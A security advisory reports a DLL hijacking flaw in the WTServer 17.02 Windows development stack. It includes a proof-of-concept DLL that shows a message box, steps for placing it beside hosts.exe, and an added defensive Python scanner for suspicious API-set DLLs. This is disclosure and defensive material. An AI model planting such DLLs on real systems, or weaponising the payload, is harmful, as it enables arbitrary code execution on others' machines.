WTServer 17.02 DLL Hijacking

10 Mar 2017 | Reported by Nassim Asrir | Type: packetstorm | Source: packetstormsecurity.com

WTServer-17.02 DLL Loading Arbitrary Code Execution vulnerability in Nginx MariaDB Redis Php development stack for Windows

Code
`[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution  
[+] Credits / Discovery: Nassim Asrir  
[+] Author Email: [email protected]  
[+] Author Company: Henceforth  
  
Vendor:  
===============  
  
http://wtserver.wtriple.com/  
  
  
Download:  
===========  
  
https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory  
  
About Product:  
===============  
  
WTServer - Nginx MariaDB Redis Php development stack for Windows  
  
A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.  
  
  
Package contains:  
- Nginx 1.11.10 web server  
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)  
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)  
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)  
- WinSCP SFTP client  
- HTTPS using free LetsEncrypt certificates  
- Composer dependency manager for php  
- Adminer web based database manager  
- Reg.php regular expressions tester  
- WTServer Manager (32/64bit), formerly known as *wt-nmp*   
  
Vulnerability Type:  
===================  
  
DLL Loading Arbitrary Code Execution.  
  
  
Information:  
===================  
  
The "hosts.exe" program is the vulnerable component in WTServer, and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".  
  
  
POC:  
===================  
Download the POC from GitHub and compile it with "CodeBlocks" or "GCC".  
  
https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b  
  
Data:  
  
// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll", then copy it to "C:\WTServer\bin\HostsEditor" and launch "hosts.exe".  
// For any information, contact me at: [email protected]  
  
#include "main.h"  
  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
// Shows a message box as visible proof that hosts.exe loaded this DLL.  
int mes()  
{  
    MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);  
    return 0;  
}  
  
BOOL WINAPI DllMain (  
    HANDLE hinstDLL,  
    DWORD fdwReason,  
    LPVOID lpvReserved)  
{  
    mes();  
    return TRUE; // DllMain is declared BOOL and must return a value  
}  
  
  
- Download the POC, compile it, and copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe" and you will see the MessageBox. You can also modify the code to launch a system command (calc or ....).  
  
  
CVE Reference:  
===============  
  
N/A  
  
  
Tested on:  
===============   
  
Windows 7  
  
Windows XP  
  
  
  
  
`
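
A defender-side check for the condition this advisory describes, as an added example that is not part of the original advisory or of WTServer: it walks an install tree and reports DLLs with API-set style names (such as the "api-ms-win-appmodel-runtime-l1-1-0.dll" named above) that sit beside an executable, with a hash for triage. The pattern list, the function names and the sample tree are assumptions constructed for this example.

```python
import fnmatch
import hashlib
import os
import tempfile

# API-set style names; a real file with such a name beside an application's
# executable deserves review. The pattern list is an assumption of this example.
WATCHED = ("api-ms-win-*.dll", "ext-ms-*.dll")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suspect_dlls(root, patterns=WATCHED):
    """Return one finding per watched DLL that shares a directory with an .exe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        if not exes:
            continue  # only directories that hold an executable are in scope
        for name in sorted(files):
            low = name.lower()  # Windows file names are case-insensitive
            if any(fnmatch.fnmatchcase(low, p) for p in patterns):
                full = os.path.join(dirpath, name)
                findings.append({"dll": full, "beside": exes,
                                 "sha256": sha256_of(full)})
    return findings


def demo():
    """Build a constructed tree shaped like the advisory's path and scan it."""
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "WTServer", "bin", "HostsEditor")
        os.makedirs(app)
        for name, data in (("hosts.exe", b"MZ-constructed"),
                           ("helper.dll", b"constructed"),
                           ("API-MS-WIN-appmodel-runtime-l1-1-0.dll", b"constructed")):
            with open(os.path.join(app, name), "wb") as f:
                f.write(data)
        return [(os.path.basename(x["dll"]), x["beside"], x["sha256"])
                for x in find_suspect_dlls(root)]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

A finding is a prompt for review rather than proof of tampering: compare the reported hash and file origin against what the installer shipped.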
